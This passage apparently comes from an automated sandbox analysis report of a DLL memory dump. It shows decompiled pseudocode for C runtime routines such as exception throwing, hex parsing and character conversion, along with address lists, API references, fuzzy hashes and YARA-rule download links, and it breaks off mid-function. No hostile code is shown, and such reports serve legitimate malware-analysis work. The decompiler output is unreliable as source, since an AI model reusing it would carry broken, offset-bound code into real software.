				E6D4924F4( &_v52, 0x6d5309b0);
				asm("int3");
				_push(_t33);
				E6D451800( &_v68, _v48);
				E6D4924F4( &_v68, 0x6d532918);
				asm("int3");
				return "bad function call";
			}

0x6d479034
0x6d47903d
0x6d47904b
0x6d479050
0x6d479051
0x6d479052
0x6d479054
0x6d47905d
0x6d47906b
0x6d479070
0x6d479071
0x6d479072
0x6d47907d
0x6d47908b
0x6d479090
0x6d479091
0x6d47909d
0x6d4790ab
0x6d4790b0
0x6d4790b6

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D47903D
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47904B

Part of subcall function 6D4924F4: RaiseException.KERNEL32(?,?,6D479030,6D4D78BB,00000000,?,00000000,?,?,?,?,6D479030,6D4D78BB,6D5308C4,?,6D4D78BB), ref: 6D492554

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D47905D
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47906B

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument$ExceptionRaise
String ID:
API String ID: 2590316965-0
Opcode ID: 54356679b46670a20673db044c4319404880512f8471cf2b9ada510f9035f3cc
Instruction ID: b9f23f0e99cb76c58567cc39754c282371c580c4670d0646a8e911b6ce8ec9bd
Opcode Fuzzy Hash: 54356679b46670a20673db044c4319404880512f8471cf2b9ada510f9035f3cc
Instruction Fuzzy Hash: 73E08C76C0420C77CF18EAF6D894CCD7B3CAA00100F824468AB10A2442EF70AB18CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6D47CFFD, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 323
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E6D47CFFD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr* _t136;
				intOrPtr* _t141;
				void* _t146;
				char _t152;
				signed int _t153;
				char* _t154;
				signed int _t160;
				void* _t166;
				void* _t167;
				char* _t173;
				void* _t174;
				void* _t175;
				void* _t185;
				intOrPtr _t186;
				intOrPtr _t192;
				intOrPtr _t198;
				char* _t199;
				intOrPtr _t213;
				char _t224;
				intOrPtr* _t235;
				signed int _t236;
				signed int _t237;
				intOrPtr _t238;
				signed int _t242;
				signed int _t243;
				char* _t247;
				signed int _t249;
				signed int _t251;
				void* _t252;
				void* _t253;
				void* _t254;
				void* _t297;

				_t297 = __fp0;
				_t254 = __eflags;
				_t234 = __edx;
				E6D490ED2(0x6d4fed62, __ebx, __edi, __esi);
				_t198 =  *((intOrPtr*)(_t252 + 0x10));
				 *((intOrPtr*)(_t252 - 0x78)) =  *((intOrPtr*)(_t252 + 0xc));
				 *((intOrPtr*)(_t252 - 0x70)) =  *((intOrPtr*)(_t252 + 0x14));
				 *(_t252 - 0x68) =  *(_t252 + 0x1c);
				_t136 = E6D47BB3E(_t198, __edx, __edi, __esi, _t254,  *(_t252 + 0x1c), 0x70);
				_t240 = _t136;
				 *0x6d5001e8(_t252 - 0x5c);
				 *((intOrPtr*)( *((intOrPtr*)( *_t136 + 0x14))))();
				 *(_t252 - 4) =  *(_t252 - 4) & 0x00000000;
				if( *((intOrPtr*)(_t252 - 0x4c)) != 0) {
					 *((char*)(_t252 - 0x5e)) = E6D47EECA(_t240);
				} else {
					 *((char*)(_t252 - 0x5e)) = 0;
				}
				_t141 = E6D45A9E0(_t198, _t234, _t297,  *(_t252 - 0x68));
				 *0x6d5001e8("0123456789ABCDEFabcdef-+Xx", 0x6d501ab3, _t252 - 0x2c);
				 *((intOrPtr*)( *((intOrPtr*)( *_t141 + 0x1c))))();
				_t247 =  *((intOrPtr*)(_t252 - 0x78));
				 *((intOrPtr*)(_t252 - 0x6c)) = _t247;
				_t146 = E6D47EC78(_t198,  *((intOrPtr*)(_t252 - 0x70)));
				if(_t146 != 0) {
					L13:
					_t249 =  *(_t252 + 0x18) & 0x00000e00;
					_t242 = 0xa;
					 *(_t252 - 0x68) = _t242;
					if(_t249 != 0x400) {
						__eflags = _t249 - 0x800;
						if(_t249 != 0x800) {
							asm("sbb esi, esi");
							_t251 =  ~_t249 & _t242;
							__eflags = _t251;
							L19:
							 *((char*)(_t252 - 0x5d)) = 0;
							 *((char*)(_t252 - 0x74)) = 0;
							 *((char*)(_t252 - 0x5f)) = 0;
							E6D47EC78(_t198,  *((intOrPtr*)(_t252 - 0x70)));
							if(0 != 0) {
								L35:
								__eflags = _t251;
								if(_t251 == 0) {
									L38:
									 *(_t252 - 0x34) =  *(_t252 - 0x34) & 0x00000000;
									 *((intOrPtr*)(_t252 - 0x30)) = 0xf;
									 *(_t252 - 0x44) = 0;
									E6D476FE2(_t252 - 0x44, 1,  *((intOrPtr*)(_t252 - 0x74)));
									 *(_t252 - 4) = 1;
									_t243 = 0;
									 *((intOrPtr*)(_t252 - 0x7c)) =  *((intOrPtr*)(_t252 - 0x78)) + 0x1f;
									_t152 = E6D47EC78(_t198,  *((intOrPtr*)(_t252 - 0x70)));
									if(_t152 != 0) {
										_t213 =  *((intOrPtr*)(_t252 - 0x30));
										_t153 =  *(_t252 - 0x44);
										L71:
										_t199 =  *((intOrPtr*)(_t252 - 0x5d));
										L72:
										_t235 = _t252 - 0x5c;
										if( *((intOrPtr*)(_t252 - 0x48)) >= 0x10) {
											_t235 =  *((intOrPtr*)(_t252 - 0x5c));
										}
										if(_t199 == 0) {
											L89:
											_t154 =  *((intOrPtr*)(_t252 - 0x78));
											goto L90;
										} else {
											while(_t243 != 0) {
												_t199 =  *_t235;
												if(_t199 == 0x7f) {
													break;
												}
												_t243 = _t243 - 1;
												if(_t243 == 0) {
													L81:
													if(_t243 != 0) {
														L85:
														_t199 = _t235 + 1;
														if( *_t199 > 0) {
															_t235 = _t199;
														}
														continue;
													}
													 *(_t252 - 0x68) = _t252 - 0x44;
													if( *((intOrPtr*)(_t252 - 0x30)) >= 0x10) {
														 *(_t252 - 0x68) = _t153;
													}
													_t213 =  *((intOrPtr*)(_t252 - 0x30));
													if(_t199 <  *( *(_t252 - 0x68))) {
														goto L89;
													} else {
														goto L85;
													}
												}
												 *(_t252 - 0x68) = _t252 - 0x44;
												_t160 =  *(_t252 - 0x44);
												if(_t213 >= 0x10) {
													_t213 =  *((intOrPtr*)(_t252 - 0x30));
													 *(_t252 - 0x68) = _t160;
												}
												_t153 =  *(_t252 - 0x44);
												if(_t199 !=  *((intOrPtr*)( *(_t252 - 0x68) + _t243))) {
													goto L89;
												} else {
													goto L81;
												}
											}
											__eflags =  *((char*)(_t252 - 0x5f));
											_t154 =  *((intOrPtr*)(_t252 - 0x6c));
											if( *((char*)(_t252 - 0x5f)) == 0) {
												 *_t154 = 0x30;
												_t154 = _t154 + 1;
											}
											L90:
											 *_t154 = 0;
											E6D457DD0(_t199, _t252 - 0x44, _t243, _t251);
											E6D457DD0(_t199, _t252 - 0x5c, _t243, _t251);
											return E6D490E7C(_t251, _t199, _t243, _t251);
										}
									}
									 *((char*)(_t252 - 0x74)) = _t152;
									do {
										if( *((char*)(_t198 + 4)) == 0) {
											E6D47DC00(_t198);
										}
										_push( *((intOrPtr*)(_t252 - 0x74)));
										 *((char*)(_t252 - 0x64)) =  *((intOrPtr*)(_t198 + 5));
										_t166 = E6D47B78E(_t252 - 0x2c, _t252 - 0x12, _t252 - 0x64);
										_t253 = _t253 + 0x10;
										_t167 = _t166 - _t252 - 0x2c;
										if(_t167 >=  *(_t252 - 0x68)) {
											_t213 =  *((intOrPtr*)(_t252 - 0x30));
											_t236 = _t252 - 0x44;
											_t153 =  *(_t252 - 0x44);
											__eflags = _t213 - 0x10;
											if(_t213 >= 0x10) {
												_t236 = _t153;
											}
											__eflags =  *((char*)(_t236 + _t243));
											if( *((char*)(_t236 + _t243)) == 0) {
												L64:
												if(_t243 == 0) {
													goto L71;
												}
												_t237 = _t252 - 0x44;
												if(_t213 >= 0x10) {
													_t237 = _t153;
												}
												if( *((char*)(_t237 + _t243)) <= 0) {
													_t199 = 0;
													goto L72;
												} else {
													_t243 = _t243 + 1;
													goto L71;
												}
											} else {
												__eflags =  *((char*)(_t252 - 0x5e));
												if( *((char*)(_t252 - 0x5e)) == 0) {
													goto L64;
												}
												__eflags =  *((char*)(_t198 + 4));
												if( *((char*)(_t198 + 4)) != 0) {
													_t238 =  *((intOrPtr*)(_t252 - 0x64));
												} else {
													E6D47DC00(_t198);
													_t238 =  *((intOrPtr*)(_t198 + 5));
													_t213 =  *((intOrPtr*)(_t252 - 0x30));
													_t153 =  *(_t252 - 0x44);
												}
												__eflags = _t238 -  *((intOrPtr*)(_t252 - 0x5e));
												if(_t238 !=  *((intOrPtr*)(_t252 - 0x5e))) {
													goto L64;
												} else {
													_push(0);
													E6D4605C0(_t198, _t252 - 0x44, _t238);
													_t243 = _t243 + 1;
													__eflags = _t243;
													goto L62;
												}
											}
										} else {
											_t224 =  *((intOrPtr*)(_t167 + "0123456789ABCDEFabcdef-+Xx"));
											_t173 =  *((intOrPtr*)(_t252 - 0x6c));
											 *_t173 = _t224;
											if( *((char*)(_t252 - 0x5f)) != 0 || _t224 != 0x30) {
												if(_t173 <  *((intOrPtr*)(_t252 - 0x7c))) {
													 *((char*)(_t252 - 0x5f)) = 1;
													 *((intOrPtr*)(_t252 - 0x6c)) = _t173 + 1;
												}
											}
											_t174 = _t252 - 0x44;
											 *((char*)(_t252 - 0x5d)) = 1;
											if( *((intOrPtr*)(_t252 - 0x30)) >= 0x10) {
												_t174 =  *(_t252 - 0x44);
											}
											if( *((char*)(_t174 + _t243)) != 0x7f) {
												_t175 = _t252 - 0x44;
												if( *((intOrPtr*)(_t252 - 0x30)) >= 0x10) {
													_t175 =  *(_t252 - 0x44);
												}
												 *((char*)(_t175 + _t243)) =  *((char*)(_t175 + _t243)) + 1;
											}
										}
										L62:
										E6D47D410(_t198);
									} while (E6D47EC78(_t198,  *((intOrPtr*)(_t252 - 0x70))) == 0);
									_t213 =  *((intOrPtr*)(_t252 - 0x30));
									_t153 =  *(_t252 - 0x44);
									goto L64;
								}
								L36:
								__eflags = _t251 - _t242;
								if(_t251 == _t242) {
									goto L38;
								}
								L37:
								 *(_t252 - 0x68) = ((0 | _t251 != 0x00000008) - 0x00000001 & 0xfffffff2) + 0x16;
								goto L38;
							}
							if( *((intOrPtr*)(_t198 + 4)) == 0) {
								E6D47DC00(_t198);
							}
							if( *((intOrPtr*)(_t198 + 5)) !=  *((intOrPtr*)(_t252 - 0x2c))) {
								goto L35;
							} else {
								 *((char*)(_t252 - 0x5d)) = 1;
								 *((char*)(_t252 - 0x74)) = 1;
								E6D47D410(_t198);
								_t185 = E6D47EC78(_t198,  *((intOrPtr*)(_t252 - 0x70)));
								if(1 != 0) {
									L33:
									__eflags = _t251;
									if(_t251 != 0) {
										goto L36;
									}
									_t251 = 8;
									goto L35;
								}
								if( *((intOrPtr*)(_t198 + 4)) == _t185) {
									E6D47DC00(_t198);
								}
								_t186 =  *((intOrPtr*)(_t198 + 5));
								if(_t186 ==  *((intOrPtr*)(_t252 - 0x13))) {
									L30:
									if(_t251 == 0 || _t251 == 0x10) {
										_t251 = 0x10;
										 *((char*)(_t252 - 0x5d)) = 0;
										 *((char*)(_t252 - 0x74)) = 0;
										E6D47D410(_t198);
										goto L37;
									} else {
										goto L33;
									}
								} else {
									if( *((char*)(_t198 + 4)) == 0) {
										E6D47DC00(_t198);
										_t186 =  *((intOrPtr*)(_t198 + 5));
									}
									if(_t186 !=  *((intOrPtr*)(_t252 - 0x14))) {
										goto L33;
									} else {
										goto L30;
									}
								}
							}
						}
						_push(0x10);
						L17:
						_pop(_t251);
						goto L19;
					}
					_push(8);
					goto L17;
				} else {
					if( *((intOrPtr*)(_t198 + 4)) == _t146) {
						E6D47DC00(_t198);
					}
					_t192 =  *((intOrPtr*)(_t198 + 5));
					if(_t192 !=  *((intOrPtr*)(_t252 - 0x15))) {
						__eflags =  *((char*)(_t198 + 4));
						if( *((char*)(_t198 + 4)) == 0) {
							E6D47DC00(_t198);
							_t192 =  *((intOrPtr*)(_t198 + 5));
						}
						__eflags = _t192 -  *((intOrPtr*)(_t252 - 0x16));
						if(_t192 !=  *((intOrPtr*)(_t252 - 0x16))) {
							goto L13;
						} else {
							 *_t247 = 0x2d;
							goto L12;
						}
					} else {
						 *_t247 = 0x2b;
						L12:
						 *((intOrPtr*)(_t252 - 0x6c)) = _t247 + 1;
						E6D47D410(_t198);
						goto L13;
					}
				}
			}

0x6d47cffd
0x6d47cffd
0x6d47cffd
0x6d47d004
0x6d47d00c
0x6d47d00f
0x6d47d015
0x6d47d01c
0x6d47d01f
0x6d47d024
0x6d47d032
0x6d47d03a
0x6d47d03c
0x6d47d044
0x6d47d053
0x6d47d046
0x6d47d046
0x6d47d046
0x6d47d059
0x6d47d076
0x6d47d07e
0x6d47d080
0x6d47d08a
0x6d47d08d
0x6d47d094
0x6d47d0d4
0x6d47d0d9
0x6d47d0df
0x6d47d0e0
0x6d47d0e9
0x6d47d0ef
0x6d47d0f5
0x6d47d0fe
0x6d47d100
0x6d47d100
0x6d47d102
0x6d47d109
0x6d47d10c
0x6d47d10f
0x6d47d112
0x6d47d119
0x6d47d199
0x6d47d199
0x6d47d19b
0x6d47d1b3
0x6d47d1b6
0x6d47d1bf
0x6d47d1c6
0x6d47d1ca
0x6d47d1da
0x6d47d1de
0x6d47d1e0
0x6d47d1e3
0x6d47d1ea
0x6d47d2f2
0x6d47d2f5
0x6d47d2f8
0x6d47d2f8
0x6d47d2fb
0x6d47d2ff
0x6d47d302
0x6d47d304
0x6d47d304
0x6d47d309
0x6d47d372
0x6d47d372
0x00000000
0x6d47d30b
0x6d47d30b
0x6d47d30f
0x6d47d314
0x00000000
0x00000000
0x6d47d316
0x6d47d319
0x6d47d33a
0x6d47d33c
0x6d47d357
0x6d47d357
0x6d47d35d
0x6d47d35f
0x6d47d35f
0x00000000
0x6d47d35d
0x6d47d345
0x6d47d348
0x6d47d34a
0x6d47d34a
0x6d47d352
0x6d47d355
0x00000000
0x00000000
0x00000000
0x00000000
0x6d47d355
0x6d47d31e
0x6d47d321
0x6d47d327
0x6d47d329
0x6d47d32c
0x6d47d32c
0x6d47d335
0x6d47d338
0x00000000
0x00000000
0x00000000
0x00000000
0x6d47d338
0x6d47d363
0x6d47d367
0x6d47d36a
0x6d47d36c
0x6d47d36f
0x6d47d36f
0x6d47d375
0x6d47d378
0x6d47d37b
0x6d47d383
0x6d47d38f
0x6d47d38f
0x6d47d309
0x6d47d1f0
0x6d47d1f3
0x6d47d1f7
0x6d47d1fb
0x6d47d1fb
0x6d47d203
0x6d47d206
0x6d47d215
0x6d47d21d
0x6d47d220
0x6d47d225
0x6d47d271
0x6d47d274
0x6d47d277
0x6d47d27a
0x6d47d27d
0x6d47d27f
0x6d47d27f
0x6d47d281
0x6d47d285
0x6d47d2d7
0x6d47d2d9
0x00000000
0x00000000
0x6d47d2db
0x6d47d2e1
0x6d47d2e3
0x6d47d2e3
0x6d47d2e9
0x6d47d2ee
0x00000000
0x6d47d2eb
0x6d47d2eb
0x00000000
0x6d47d2eb
0x6d47d287
0x6d47d287
0x6d47d28b
0x00000000
0x00000000
0x6d47d28d
0x6d47d291
0x6d47d2a5
0x6d47d293
0x6d47d295
0x6d47d29a
0x6d47d29d
0x6d47d2a0
0x6d47d2a0
0x6d47d2a8
0x6d47d2ab
0x00000000
0x6d47d2ad
0x6d47d2ad
0x6d47d2b2
0x6d47d2b7
0x6d47d2b7
0x00000000
0x6d47d2b7
0x6d47d2ab
0x6d47d227
0x6d47d22b
0x6d47d231
0x6d47d234
0x6d47d236
0x6d47d240
0x6d47d243
0x6d47d247
0x6d47d247
0x6d47d240
0x6d47d24e
0x6d47d251
0x6d47d255
0x6d47d257
0x6d47d257
0x6d47d25e
0x6d47d264
0x6d47d267
0x6d47d269
0x6d47d269
0x6d47d26c
0x6d47d26c
0x6d47d25e
0x6d47d2b8
0x6d47d2ba
0x6d47d2c9
0x6d47d2d1
0x6d47d2d4
0x00000000
0x6d47d2d4
0x6d47d19d
0x6d47d19d
0x6d47d19f
0x00000000
0x00000000
0x6d47d1a1
0x6d47d1b0
0x00000000
0x6d47d1b0
0x6d47d11e
0x6d47d122
0x6d47d122
0x6d47d12d
0x00000000
0x6d47d12f
0x6d47d133
0x6d47d136
0x6d47d139
0x6d47d143
0x6d47d14a
0x6d47d192
0x6d47d192
0x6d47d194
0x00000000
0x00000000
0x6d47d198
0x00000000
0x6d47d198
0x6d47d14f
0x6d47d153
0x6d47d153
0x6d47d158
0x6d47d15e
0x6d47d175
0x6d47d177
0x6d47d184
0x6d47d185
0x6d47d188
0x6d47d18b
0x00000000
0x00000000
0x00000000
0x00000000
0x6d47d160
0x6d47d164
0x6d47d168
0x6d47d16d
0x6d47d16d
0x6d47d173
0x00000000
0x00000000
0x00000000
0x00000000
0x6d47d173
0x6d47d15e
0x6d47d12d
0x6d47d0f7
0x6d47d0f9
0x6d47d0f9
0x00000000
0x6d47d0f9
0x6d47d0eb
0x00000000
0x6d47d096
0x6d47d099
0x6d47d09d
0x6d47d09d
0x6d47d0a2
0x6d47d0a8
0x6d47d0af
0x6d47d0b3
0x6d47d0b7
0x6d47d0bc
0x6d47d0bc
0x6d47d0bf
0x6d47d0c2
0x00000000
0x6d47d0c4
0x6d47d0c4
0x00000000
0x6d47d0c4
0x6d47d0aa
0x6d47d0aa
0x6d47d0c7
0x6d47d0cc
0x6d47d0cf
0x00000000
0x6d47d0cf
0x6d47d0a8

APIs

__EH_prolog3_GS.LIBCMT ref: 6D47D004

Part of subcall function 6D47BB3E: __EH_prolog3.LIBCMT ref: 6D47BB45
Part of subcall function 6D47BB3E: std::_Lockit::_Lockit.LIBCPMT ref: 6D47BB4F
Part of subcall function 6D47BB3E: std::_Lockit::~_Lockit.LIBCPMT ref: 6D47BBC0

_Find_unchecked1.LIBCPMT ref: 6D47D215

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 6D47D06C

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: Lockitstd::_$Find_unchecked1H_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 1853221402-2799312399
Opcode ID: dea9fd856cb932d0d46adab0f052b7f59e55f1622551324ea3261585f3dfd180
Instruction ID: fa3b9daee3f18e41012d57f57573ee97e85f099d92543b5d3c1c69d558b19e5c
Opcode Fuzzy Hash: dea9fd856cb932d0d46adab0f052b7f59e55f1622551324ea3261585f3dfd180
Instruction Fuzzy Hash: 3BC19130E28289CEDF21DFA8C590FECBBB6AF86304F25455DC8956B346C7249D46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D4B7C1D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 6D4B7CAD

Strings

pow, xrefs: 6D4B7C85, 6D4B7CA2

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: b507c0f053975e56e87fd173f75c81c7c0f6851c0b1bc3c218f23fc8b76da5d9
Instruction ID: 771380e0f8fc9e27472e3a77cf89ef2e8e80128af332eeb17585f8d318386dda
Opcode Fuzzy Hash: b507c0f053975e56e87fd173f75c81c7c0f6851c0b1bc3c218f23fc8b76da5d9
Instruction Fuzzy Hash: 42514765E1C703A7CB02BB24C990F7A3BB4AB51741F31C95CE0A542398EB358C959E97

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C22D0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E6D4C22D0(void* __eflags, intOrPtr* _a4) {
				void* _t14;
				void* _t16;
				intOrPtr _t19;
				intOrPtr _t25;
				intOrPtr _t34;
				intOrPtr* _t37;
				intOrPtr* _t38;

				_t38 = _a4;
				if(E6D4D1498(E6D4BF5E9(_t38)) != 0) {
					_t14 = E6D4B4867(1);
					_t25 = 2;
					if(_t38 != _t14) {
						if(_t38 != E6D4B4867(_t25)) {
							L12:
							_t16 = 0;
							L13:
							return _t16;
						}
						_t37 = 0x6d540948;
						L6:
						 *0x6d5403dc =  *0x6d5403dc + 1;
						_t31 = _t38 + 0xc;
						if(( *(_t38 + 0xc) & 0x000004c0) != 0) {
							goto L12;
						}
						asm("lock or [ecx], eax");
						_t19 =  *_t37;
						if(_t19 != 0) {
							L10:
							 *((intOrPtr*)(_t38 + 4)) = _t19;
							 *_t38 =  *_t37;
							 *((intOrPtr*)(_t38 + 8)) = 0x1000;
							 *((intOrPtr*)(_t38 + 0x18)) = 0x1000;
							L11:
							_t16 = 1;
							goto L13;
						}
						 *_t37 = E6D4C1817(_t31, 0x1000);
						E6D4C02CE(0);
						_t19 =  *_t37;
						if(_t19 != 0) {
							goto L10;
						}
						_t34 = _t38 + 0x14;
						 *((intOrPtr*)(_t38 + 8)) = _t25;
						 *((intOrPtr*)(_t38 + 4)) = _t34;
						 *_t38 = _t34;
						 *((intOrPtr*)(_t38 + 0x18)) = _t25;
						goto L11;
					}
					_t37 = 0x6d540944;
					goto L6;
				}
				return 0;
			}

0x6d4c22d6
0x6d4c22e9
0x6d4c22f6
0x6d4c22fe
0x6d4c2301
0x6d4c2313
0x6d4c237e
0x6d4c237e
0x6d4c2380
0x00000000
0x6d4c2381
0x6d4c2315
0x6d4c231a
0x6d4c231a
0x6d4c2320
0x6d4c232a
0x00000000
0x00000000
0x6d4c2331
0x6d4c2334
0x6d4c2338
0x6d4c2365
0x6d4c2365
0x6d4c236a
0x6d4c236c
0x6d4c2373
0x6d4c237a
0x6d4c237a
0x00000000
0x6d4c237a
0x6d4c2346
0x6d4c2348
0x6d4c234d
0x6d4c2353
0x00000000
0x00000000
0x6d4c2355
0x6d4c2358
0x6d4c235b
0x6d4c235e
0x6d4c2360
0x00000000
0x6d4c2360
0x6d4c2303
0x00000000
0x6d4c2303
0x00000000

APIs

_free.LIBCMT ref: 6D4C2348

Strings

DTm, xrefs: 6D4C2303
HTm, xrefs: 6D4C2315

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: DTm$HTm
API String ID: 269201875-2435632002
Opcode ID: c0f929f38c6788b7d367325c221124d649212d20db55346b7e6930ad61a80a42
Instruction ID: af1f8f997447600e55b5ebc96017d885417481b4998f513798888fbb771f9472
Opcode Fuzzy Hash: c0f929f38c6788b7d367325c221124d649212d20db55346b7e6930ad61a80a42
Instruction Fuzzy Hash: 2D11B4791083029FE770CF3DD480F5677E8EB167A8B30942EE5998B651DBB19C4187A2

Uniqueness

Uniqueness Score: -1.00%

Function 6D47B267, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000D,?,6D476FA5,00000001,6D4FBC90,6D453DBA,00000000,?,6D4533B4,6D55A9D8,6D461B20,6D55AA00,6D453DBA,6D4FBC90,00000001,6D4FBC90), ref: 6D47B2EB

Strings

ios_base::failbit set, xrefs: 6D47B26A

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast
String ID: ios_base::failbit set
API String ID: 1452528299-3924258884
Opcode ID: b39ed234d45b2ee9e424e95ca85166834d63181747981e296df365c69ae2a53b
Instruction ID: e8b389e8d7a93fc17d91a94b60fcd5ffb24940e99543250d3c3390aa8d1685eb
Opcode Fuzzy Hash: b39ed234d45b2ee9e424e95ca85166834d63181747981e296df365c69ae2a53b
Instruction Fuzzy Hash: E611CE3630511AAFCF239E69CC48EAEBB75FF09311B128039F929D6610DB319C118BD0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C5F71, Relevance: 5.1, APIs: 4, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D4C5F71(void* __edx, void* __fp0, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
				char* _v8;
				int _v12;
				char _v16;
				char _v24;
				char _v28;
				void* __ebx;
				char _t34;
				int _t35;
				int _t38;
				long _t39;
				char* _t42;
				int _t44;
				int _t47;
				int _t53;
				intOrPtr _t55;
				void* _t56;
				char* _t57;
				char* _t62;
				char* _t63;
				void* _t64;
				int _t65;
				short* _t67;
				short* _t68;
				int _t69;
				intOrPtr* _t70;
				void* _t74;

				_t74 = __fp0;
				_t64 = __edx;
				_t53 = _a12;
				_t67 = _a4;
				_t68 = 0;
				if(_t67 == 0) {
					L3:
					if(_a8 != _t68) {
						E6D49C92A(_t53,  &_v28, _t64, _t74, _a16);
						_t34 = _v24;
						__eflags = _t67;
						if(_t67 == 0) {
							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
								_t69 = _t68 | 0xffffffff;
								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
								__eflags = _t35;
								if(_t35 != 0) {
									L29:
									_t28 = _t35 - 1; // -1
									_t69 = _t28;
									L30:
									__eflags = _v16;
									if(_v16 != 0) {
										_t55 = _v28;
										_t31 = _t55 + 0x350;
										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
										__eflags =  *_t31;
									}
									return _t69;
								}
								 *((intOrPtr*)(E6D4B41F9())) = 0x2a;
								goto L30;
							}
							_t70 = _a8;
							_t25 = _t70 + 1; // 0x1
							_t56 = _t25;
							do {
								_t38 =  *_t70;
								_t70 = _t70 + 1;
								__eflags = _t38;
							} while (_t38 != 0);
							_t69 = _t70 - _t56;
							goto L30;
						}
						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
							_t69 = _t68 | 0xffffffff;
							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
							__eflags = _t35;
							if(_t35 != 0) {
								goto L29;
							}
							_t39 = GetLastError();
							__eflags = _t39 - 0x7a;
							if(_t39 != 0x7a) {
								L21:
								 *((intOrPtr*)(E6D4B41F9())) = 0x2a;
								 *_t67 = 0;
								goto L30;
							}
							_t42 = _a8;
							_t57 = _t42;
							_v8 = _t57;
							_t65 = _t53;
							__eflags = _t53;
							if(_t53 == 0) {
								L20:
								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
								__eflags = _t44;
								if(_t44 != 0) {
									_t69 = _t44;
									goto L30;
								}
								goto L21;
							} else {
								goto L15;
							}
							while(1) {
								L15:
								_t45 =  *_t57;
								_v12 = _t65 - 1;
								__eflags =  *_t57;
								if(__eflags == 0) {
									break;
								}
								_t47 = E6D4BFC85(__eflags, _t45 & 0x000000ff,  &_v24);
								_t62 = _v8;
								__eflags = _t47;
								if(_t47 == 0) {
									L18:
									_t65 = _v12;
									_t57 = _t62 + 1;
									_v8 = _t57;
									__eflags = _t65;
									if(_t65 != 0) {
